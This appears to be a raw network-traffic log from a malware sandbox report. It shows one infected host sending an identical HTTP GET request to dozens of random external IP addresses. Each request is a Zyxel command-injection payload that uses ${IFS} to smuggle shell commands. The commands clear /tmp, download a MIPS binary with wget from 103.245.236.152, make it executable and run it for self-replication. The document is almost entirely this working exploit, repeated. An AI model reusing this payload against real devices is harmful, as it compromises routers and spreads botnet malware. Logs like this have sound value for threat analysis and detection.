                                            Jan 14, 2024 15:50:33.315824032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2694192.168.2.235367681.196.69.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.315855980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2695192.168.2.2351218182.101.30.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.315898895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2696192.168.2.2341024111.249.233.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.315898895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2697192.168.2.235065492.213.177.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.315922022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2698192.168.2.234975475.181.147.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.315922022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2699192.168.2.2353244148.137.110.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.315993071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2700192.168.2.235448057.65.26.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.316016912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2701192.168.2.235688042.73.147.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.316035986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2702192.168.2.234398874.95.233.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.316056967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2703192.168.2.2335862170.212.162.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.316096067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2704192.168.2.2353888131.109.26.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.316133976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2705192.168.2.2335436162.10.131.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.316160917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2706192.168.2.2360196201.16.14.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323019028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2707192.168.2.233749094.109.61.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323038101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2708192.168.2.2344250212.221.8.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323061943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2709192.168.2.2359190154.141.79.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323074102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2710192.168.2.234897874.151.45.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323108912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2711192.168.2.235334849.169.204.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323132992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2712192.168.2.23557989.30.25.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323194981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2713192.168.2.2337964174.19.125.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323220968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2714192.168.2.2347964158.197.170.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323220968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2715192.168.2.234447420.155.84.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323271990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2716192.168.2.234490079.241.141.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323302031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2717192.168.2.2349286221.46.215.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323323011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2718192.168.2.2341374176.168.255.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323343992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2719192.168.2.234179820.74.41.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323385954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2720192.168.2.2336398135.107.14.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323425055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2721192.168.2.2359514189.184.81.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323446989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2722192.168.2.235353424.231.231.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323478937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2723192.168.2.235102854.77.187.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323498964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2724192.168.2.233698098.6.233.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323504925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2725192.168.2.2356156193.184.190.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323532104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2726192.168.2.2356758219.21.219.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323565960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2727192.168.2.233373014.68.190.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323585987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2728192.168.2.2332930110.153.62.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323637962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2729192.168.2.2341604166.167.157.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323668957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2730192.168.2.2358336208.102.94.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323692083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2731192.168.2.2350894154.93.13.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323719978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2732192.168.2.2348296165.157.139.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323761940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2733192.168.2.235392096.94.70.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323769093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2734192.168.2.23476505.192.41.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323792934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2735192.168.2.233898475.57.251.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323858023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2736192.168.2.2349702175.129.202.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323884010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2737192.168.2.234228694.135.202.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323923111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2738192.168.2.234466041.203.97.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323942900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2739192.168.2.2360270204.226.99.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.323987961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2740192.168.2.2340588108.88.251.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324009895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2741192.168.2.233538047.152.79.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324043989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2742192.168.2.2343600201.240.178.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324075937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2743192.168.2.2352392104.81.176.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324099064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2744192.168.2.234196023.180.8.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324132919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2745192.168.2.2356824109.32.252.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324147940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2746192.168.2.2346304103.248.215.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324217081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2747192.168.2.234252825.164.41.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324218035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2748192.168.2.234130013.79.6.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324256897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2749192.168.2.2333758190.2.117.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324275970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2750192.168.2.2343774133.124.246.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324295998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2751192.168.2.2352444170.187.1.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324343920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2752192.168.2.2340884179.44.134.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324359894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2753192.168.2.2340996176.136.64.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324387074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2754192.168.2.2344592141.36.230.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324419975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2755192.168.2.2354592219.85.161.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.324450970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2756192.168.2.2346134165.216.216.205443
                                            TimestampBytes transferredDirectionData
